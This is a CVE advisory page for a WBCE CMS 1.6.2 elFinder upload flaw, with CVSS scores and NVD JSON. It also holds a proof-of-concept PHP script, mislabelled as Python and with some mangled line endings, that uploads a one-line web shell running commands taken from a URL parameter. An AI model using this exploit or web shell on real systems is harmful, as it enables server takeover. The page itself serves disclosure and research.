Security Vulnerability Report
中文
CVE-2024-58283 CVSS 8.8 HIGH

CVE-2024-58283

Published: 2025-12-10 22:16:20
Last Modified: 2025-12-16 15:09:05
Source: [email protected]

Description

WBCE CMS version 1.6.2 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the Elfinder file manager. Attackers can exploit the file upload functionality in the elfinder connector to upload a web shell and execute arbitrary system commands through a user-controlled parameter.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wbce:wbce_cms:1.6.2:*:*:*:*:*:*:* - VULNERABLE
WBCE CMS 1.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2024-58283 PoC - WBCE CMS ElFinder RCE // Authentication required with low privilege access $target = 'http://target-site.com/admin/elfinder/connector.minimal.php'; $upload_path = '/var/www/html/media/'; // or any writable directory // Create malicious PHP webshell $webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'; // Prepare multipart form data for file upload $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8)); $body = "--{$boundary}\r "; $body .= 'Content-Disposition: form-data; name="upload[]"; filename="shell.php"\r '; $body .= "Content-Type: application/x-php\r\n\r\n"; $body .= $webshell . "\r\n"; $body .= "--{$boundary}--\r\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target . '?cmd=upload&target=l1_Lw'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $body); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . $boundary, 'Cookie: WBCE_SESSION=your_authenticated_session' ]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "Upload Response: $response\n"; echo "Shell uploaded at: http://target-site.com/media/shell.php?cmd=id\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58283", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:20.267", "lastModified": "2025-12-16T15:09:04.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WBCE CMS version 1.6.2 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the Elfinder file manager. Attackers can exploit the file upload functionality in the elfinder connector to upload a web shell and execute arbitrary system commands through a user-controlled parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wbce:wbce_cms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "FFE9AA75-B493-4593-9A24-CDEAE2A6A2CB"}]}]}], "references": [{"url": "https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wbce-cms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52039", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wbce-cms-remote-code-execution-via-elfinder-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.